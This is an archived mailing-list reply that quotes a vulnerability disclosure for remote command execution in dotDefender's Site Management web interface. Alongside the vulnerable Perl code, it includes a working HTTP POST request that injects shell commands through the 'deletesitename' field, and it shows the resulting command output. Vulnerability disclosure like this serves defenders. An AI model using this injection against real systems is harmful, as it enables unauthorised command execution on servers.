| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Wed, 30 Jun 2010 23:56:01 +0300
From: Henri Salo <henri@...v.fi>
To: John Dos <dotdefeater@...glemail.com>
Cc: bugtraq <bugtraq@...urityfocus.com>
Subject: Re: [Full-disclosure] Remote Command Execution in dotDefender Site
Management
On Mon, 30 Nov 2009 16:48:49 +0100
John Dos <dotdefeater@...glemail.com> wrote:
> Problem Description
> ===================
>
> A remote command execution vulnerability exists in the dotDefender
> (3.8-5) Site Management.
>
>
> dotDefender [1] is a web appliaction firewall (WAF) which 'prevents
> hackers from attacking your
> website.'
>
>
> Technical Details
> =================
>
> The Site Management application of dotDefender is reachable as a web
> application (https:site/dotDefender/)
> on the webserver. After passing the Basic Auth login you can
> create/delete applications.
> The mentioned vulnerability is in the 'deletesite' implementation and
> the 'deletesitename' variable.
> Insufficient input validation allows an attacker to inject arbitrary
> commands.
>
>
> Delete Site
> ===========
>
> A normal delete transaction looks as follow:
>
> POST /dotDefender/index.cgi HTTP/1.1
> Host: 172.16.159.132
> User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US;
> rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
> Accept:
> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate
> Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
> Keep-Alive: 300
> Connection: keep-alive
> Referer: https://172.16.159.132/dotDefender/index.cgi
> Authorization: Basic YWRtaW46
> Cache-Control: max-age=0
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 76
>
> sitename=dotdefeater&deletesitename=dotdefeater&action=deletesite&linenum=14
>
> An attack looks like:
>
> --------------------/Request/--------------------
> POST /dotDefender/index.cgi HTTP/1.1
> Host: 172.16.159.132
> User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US;
> rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
> Accept:
> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate
> Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
> Keep-Alive: 300
> Connection: keep-alive
> Referer: https://172.16.159.132/dotDefender/index.cgi
> Authorization: Basic YWRtaW46
> Cache-Control: max-age=0
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 95
>
> sitename=dotdefeater&deletesitename=dotdefeater;id;ls -al
> ../;pwd;&action=deletesite&linenum=15
>
> --------------------/Response/--------------------
> [...]
> <br>
> uid=33(www-data) gid=33(www-data) groups=33(www-data)
> total 12
> drwxr-xr-x 3 root root 4096 Nov 23 02:37 .
> drwxr-xr-x 9 root root 4096 Nov 23 02:37 ..
> drwxr-xr-x 7 www-data 99 4096 Nov 23 07:11 admin
> /usr/local/APPCure-full/lib/admin
> uid=33(www-data) gid=33(www-data) groups=33(www-data)
> total 12
> drwxr-xr-x 3 root root 4096 Nov 23 02:37 .
> drwxr-xr-x 9 root root 4096 Nov 23 02:37 ..
> drwxr-xr-x 7 www-data 99 4096 Nov 23 07:11 admin
> /usr/local/APPCure-full/lib/admin
> uid=33(www-data) gid=33(www-data) groups=33(www-data)
> total 12
> drwxr-xr-x 3 root root 4096 Nov 23 02:37 .
> drwxr-xr-x 9 root root 4096 Nov 23 02:37 ..
> drwxr-xr-x 7 www-data 99 4096 Nov 23 07:11 admin
> /usr/local/APPCure-full/lib/admin
> uid=33(www-data) gid=33(www-data) groups=33(www-data)
> total 12
> drwxr-xr-x 3 root root 4096 Nov 23 02:37 .
> drwxr-xr-x 9 root root 4096 Nov 23 02:37 ..
> drwxr-xr-x 7 www-data 99 4096 Nov 23 07:11 admin
> /usr/local/APPCure-full/lib/admin
> [...]
>
>
>
> Affected Code
> =============
>
> The affected code (perl) is in index1.cgi of the admin interface:
>
> 311
> 312 }elsif($action eq "deletesite") {
> # delete site
> 313 $deletesitename=$postFields{"deletesitename"};
> 314 $dots_index = index($deletesitename,"%3A");
> 315
> 316 if($dots_index != -1 ) {
> 317 $site_a_part=
> substr($deletesitename,0,$dots_index); 318 $site_b_part=
> substr($deletesitename,$dots_index+3,length($deletesitename)-$dots_index-2);
> 319 $site_a_part=&cleanIt($site_a_part);
> 320 $site_b_part=&cleanIt($site_b_part);
> 321 $deletesitename = $site_a_part.":".$site_b_part;
> 322 }
> 323
> 324 $linenum=$postFields{'linenum'};
> 325 applyDbAudit($action);
> 326 &delline($linenum,2);
> 327 cleanSiteFingerPrints($deletesitename);
> 328
> 329 &deleteSiteConf($deletesitename);
> 330 $site_params="$CTMP_DIR/".$deletesitename."_params";
> 331 system("rm -f $site_params");
>
>
> And applicure-lib2.pl:
>
> 13 sub cleanIt {
> 14 my($param,$type)=@_;
> 15
> 16 $param =~ s/%([a-fA-F0-9]{2})/pack "H2", $1/eg;
> 17 if ($type eq 'any') {
> 18 } elsif ($type eq 'filter') {
> 19 $param =~ s/\+/" "/eg;
> 20 } elsif ($type eq 'path') {
> 21 $param = un_urlize($param);
> 22 #$param =~ s/([^A-Za-z0-9\-_.\/~'])//g;
> 23 #$param =~ s/\+/" "/eg;
> 24 } else {
> 25 $param =~ s/([^A-Za-z0-9\-_.~'])//g;
> 26 }
> 27 return $param;
> 28 }
>
>
> Here one can see that certain shell control characters are not
> protected by the call to cleanIt. Thus an attacker
> can gain control of the system call in line 331 of index1.cgi.
>
>
> References
> ===========
>
> [1] http://applicure.com/
Have they fixed this issue? Does this have CVE-identifier assigned?
---
Henri Salo
Powered by blists - more mailing lists